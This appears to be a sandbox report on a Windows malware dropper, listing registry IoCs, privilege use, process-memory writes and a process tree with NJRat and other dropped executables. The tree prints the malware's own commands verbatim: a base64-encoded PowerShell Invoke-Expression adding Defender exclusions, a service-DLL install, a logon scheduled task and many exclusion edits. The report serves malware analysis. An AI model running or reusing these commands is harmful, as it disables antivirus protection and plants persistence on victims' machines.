Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	OpenWith.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1704	reg.exe

Opens file in notepad (likely ransom note) 5 IoCs

ransomware

pid	Process
1536	NOTEPAD.EXE
4052	NOTEPAD.EXE
3524	NOTEPAD.EXE
4664	NOTEPAD.EXE
2608	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3660	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4216	Update.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe
2400	nano.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
4216	Update.exe
2400	nano.exe
1684	OpenWith.exe
4328	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3428	printui.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	1536	4363463463464363463463463.exe
Token: SeDebugPrivilege	4328	taskmgr.exe
Token: SeSystemProfilePrivilege	4328	taskmgr.exe
Token: SeCreateGlobalPrivilege	4328	taskmgr.exe
Token: SeDebugPrivilege	2400	nano.exe
Token: SeDebugPrivilege	1036	NJRat.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: 33	1036	NJRat.exe
Token: SeIncBasePriorityPrivilege	1036	NJRat.exe
Token: 33	1036	NJRat.exe
Token: SeIncBasePriorityPrivilege	1036	NJRat.exe
Token: 33	1036	NJRat.exe
Token: SeIncBasePriorityPrivilege	1036	NJRat.exe
Token: 33	1036	NJRat.exe
Token: SeIncBasePriorityPrivilege	1036	NJRat.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: 33	1036	NJRat.exe
Token: SeIncBasePriorityPrivilege	1036	NJRat.exe
Token: SeDebugPrivilege	372	powershell.exe
Token: SeDebugPrivilege	916	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeShutdownPrivilege	4308	chrome.exe
Token: SeCreatePagefilePrivilege	4308	chrome.exe
Token: SeShutdownPrivilege	4308	chrome.exe
Token: SeCreatePagefilePrivilege	4308	chrome.exe
Token: SeShutdownPrivilege	4308	chrome.exe
Token: SeCreatePagefilePrivilege	4308	chrome.exe
Token: SeShutdownPrivilege	4308	chrome.exe
Token: SeCreatePagefilePrivilege	4308	chrome.exe
Token: SeShutdownPrivilege	4308	chrome.exe
Token: SeCreatePagefilePrivilege	4308	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
2732	random.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe
4328	taskmgr.exe

Suspicious use of SetWindowsHookEx 25 IoCs

pid	Process
4216	Update.exe
4216	Update.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1684	OpenWith.exe
1116	OpenWith.exe
4936	OpenWith.exe
4936	OpenWith.exe
4936	OpenWith.exe
4936	OpenWith.exe
4936	OpenWith.exe
4936	OpenWith.exe
4936	OpenWith.exe
4936	OpenWith.exe
4936	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1536 wrote to memory of 4136	1536	4363463463464363463463463.exe	86
PID 1536 wrote to memory of 4136	1536	4363463463464363463463463.exe	86
PID 1536 wrote to memory of 4216	1536	4363463463464363463463463.exe	92
PID 1536 wrote to memory of 4216	1536	4363463463464363463463463.exe	92
PID 1536 wrote to memory of 4216	1536	4363463463464363463463463.exe	92
PID 1536 wrote to memory of 4164	1536	4363463463464363463463463.exe	95
PID 1536 wrote to memory of 4164	1536	4363463463464363463463463.exe	95
PID 1536 wrote to memory of 4164	1536	4363463463464363463463463.exe	95
PID 1536 wrote to memory of 2400	1536	4363463463464363463463463.exe	98
PID 1536 wrote to memory of 2400	1536	4363463463464363463463463.exe	98
PID 1536 wrote to memory of 2400	1536	4363463463464363463463463.exe	98
PID 1536 wrote to memory of 3640	1536	4363463463464363463463463.exe	99
PID 1536 wrote to memory of 3640	1536	4363463463464363463463463.exe	99
PID 1536 wrote to memory of 3640	1536	4363463463464363463463463.exe	99
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 4164 wrote to memory of 2996	4164	7mpPLxE.exe	100
PID 1536 wrote to memory of 1668	1536	4363463463464363463463463.exe	106
PID 1536 wrote to memory of 1668	1536	4363463463464363463463463.exe	106
PID 1668 wrote to memory of 1836	1668	feb9sxwk.exe	107
PID 1668 wrote to memory of 1836	1668	feb9sxwk.exe	107
PID 1668 wrote to memory of 4932	1668	feb9sxwk.exe	108
PID 1668 wrote to memory of 4932	1668	feb9sxwk.exe	108
PID 1836 wrote to memory of 2332	1836	cmd.exe	114
PID 1836 wrote to memory of 2332	1836	cmd.exe	114
PID 4932 wrote to memory of 3048	4932	cmd.exe	116
PID 4932 wrote to memory of 3048	4932	cmd.exe	116
PID 2332 wrote to memory of 376	2332	curlapp64.exe	117
PID 2332 wrote to memory of 376	2332	curlapp64.exe	117
PID 2332 wrote to memory of 4016	2332	curlapp64.exe	119
PID 2332 wrote to memory of 4016	2332	curlapp64.exe	119
PID 4016 wrote to memory of 3428	4016	cmd.exe	121
PID 4016 wrote to memory of 3428	4016	cmd.exe	121
PID 2332 wrote to memory of 4524	2332	curlapp64.exe	122
PID 2332 wrote to memory of 4524	2332	curlapp64.exe	122
PID 4524 wrote to memory of 2040	4524	cmd.exe	124
PID 4524 wrote to memory of 2040	4524	cmd.exe	124
PID 1536 wrote to memory of 2732	1536	4363463463464363463463463.exe	128
PID 1536 wrote to memory of 2732	1536	4363463463464363463463463.exe	128
PID 1536 wrote to memory of 2732	1536	4363463463464363463463463.exe	128
PID 1536 wrote to memory of 2728	1536	4363463463464363463463463.exe	130
PID 1536 wrote to memory of 2728	1536	4363463463464363463463463.exe	130
PID 2732 wrote to memory of 2760	2732	random.exe	132
PID 2732 wrote to memory of 2760	2732	random.exe	132
PID 2732 wrote to memory of 2760	2732	random.exe	132
PID 1536 wrote to memory of 1036	1536	4363463463464363463463463.exe	134
PID 1536 wrote to memory of 1036	1536	4363463463464363463463463.exe	134
PID 1536 wrote to memory of 1036	1536	4363463463464363463463463.exe	134
PID 1536 wrote to memory of 1700	1536	4363463463464363463463463.exe	136
PID 1536 wrote to memory of 1700	1536	4363463463464363463463463.exe	136
PID 1036 wrote to memory of 3048	1036	NJRat.exe	139
PID 1036 wrote to memory of 3048	1036	NJRat.exe	139
PID 1036 wrote to memory of 3048	1036	NJRat.exe	139
PID 1532 wrote to memory of 2268	1532	cmd.exe	144
PID 1532 wrote to memory of 2268	1532	cmd.exe	144
PID 1536 wrote to memory of 1468	1536	4363463463464363463463463.exe	145
PID 1536 wrote to memory of 1468	1536	4363463463464363463463463.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536
- C:\Users\Admin\AppData\Local\Temp\Files\test9.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\test9.exe"
  2⤵
  - Executes dropped EXE
  PID:4136
- C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:4216
- C:\Users\Admin\AppData\Local\Temp\Files\7mpPLxE.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\7mpPLxE.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Users\Admin\AppData\Local\Temp\Files\7mpPLxE.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\7mpPLxE.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 1388
      4⤵
      Program crash
      PID:2228
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 1124
      4⤵
      Program crash
      PID:4696
- C:\Users\Admin\AppData\Local\Temp\Files\nano.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\nano.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2400
- C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3640
- C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2332
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c mkdir "\\?\C:\Windows \System32"
        5⤵
        
        PID:376
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows \System32\printui.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4016
      - C:\Windows \System32\printui.exe
        
        "C:\Windows \System32\printui.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:3428
        
        C:\WINDOWS\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2268
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
        7⤵
        
        PID:3168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c sc create x638368 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x638368\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x638368.dat" /f && sc start x638368
        7⤵
        
        PID:1376
        
        C:\Windows\System32\sc.exe
        
        sc create x638368 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
        8⤵
        Launches sc.exe
        
        PID:1112
        
        C:\Windows\System32\reg.exe
        
        reg add HKLM\SYSTEM\CurrentControlSet\services\x638368\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x638368.dat" /f
        8⤵
        Server Software Component: Terminal Services DLL
        Modifies registry key
        
        PID:1704
        
        C:\Windows\System32\sc.exe
        
        sc start x638368
        8⤵
        Launches sc.exe
        
        PID:4960
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
        7⤵
        
        PID:720
        
        C:\Windows\System32\console_zero.exe
        
        "C:\Windows\System32\console_zero.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:876
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        9⤵
        
        PID:720
        
        C:\Windows\System32\schtasks.exe
        
        schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3660
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
        7⤵
        
        PID:3608
        
        C:\Windows\System32\bav64.exe
        
        "C:\Windows\System32\bav64.exe"
        8⤵
        Deletes itself
        Drops startup file
        Executes dropped EXE
        
        PID:5116
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
        9⤵
        
        PID:3188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:916
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
        9⤵
        
        PID:1084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4156
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
        9⤵
        
        PID:3808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:936
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
        9⤵
        
        PID:3492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
        9⤵
        
        PID:5016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1032
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
        9⤵
        
        PID:2188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
        9⤵
        
        PID:4932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4016
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
        9⤵
        
        PID:4484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4992
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'"
        9⤵
        
        PID:1812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1956
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
        9⤵
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1708
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
        9⤵
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3884
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
        9⤵
        
        PID:1368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3600
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
        9⤵
        
        PID:4968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3364
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
        9⤵
        
        PID:3492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3244
        
        C:\Windows\System32\cmd.exe
        
        cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
        9⤵
        
        PID:4832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
